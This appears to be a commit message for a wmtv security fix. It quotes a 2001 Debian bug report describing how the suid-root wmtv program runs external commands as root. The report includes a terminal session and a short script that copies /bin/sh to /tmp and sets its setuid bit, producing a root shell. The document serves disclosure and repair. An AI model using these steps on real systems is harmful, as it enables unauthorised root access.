wmtv: Fix security hole.
Patch by Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>. From [1]:
From: Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: wmtv: dangerous suid root
Date: Thu, 08 Nov 2001 20:07:52 +0100
Hi !
I think there is a huge security hole with wmtv and, when wmtv is installed,
anyone can easily get a root account. Here is what I have in my terminal:
(everytime I launch wmtv, I double-clicked in the tv subwindow to call the
external program)
----------------------------------------------------------------------
Tintin:~> wmtv -e whoami
root
Tintin:~> cat > crack_root.sh
#!/bin/sh
cp /bin/sh /tmp
chmod u+s /tmp/sh
Tintin:~> chmod +x crack_root.sh
Tintin:~> wmtv -e ~/crack_root.sh
Tintin:~> ll /tmp/sh
-rwsr-xr-x 1 root users 407356 Nov 8 19:25 /tmp/sh*
----------------------------------------------------------------------
I tried to make wmtv non-suid root, and... sometimes it works (despite an
error message), sometimes it does not...
----------------------------------------------------------------------
Tintin:~> ll /usr/bin/X11/wmtv
-rwxr-xr-x 1 root root 62588 Jul 31 01:55 /usr/bin/X11/wmtv*
Tintin:~> wmtv
ioctl VIDIOCSFBUF: Operation not permitted
Tintin:~> wmtv
ioctl VIDIOCSFBUF: Operation not permitted
wmtv: no physical frame buffer access
----------------------------------------------------------------------
Hence, I guess you should either correct wmtv so that it always work without
being suid root, or make wmtv lose its privileges before it runs an external
program.
[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=118778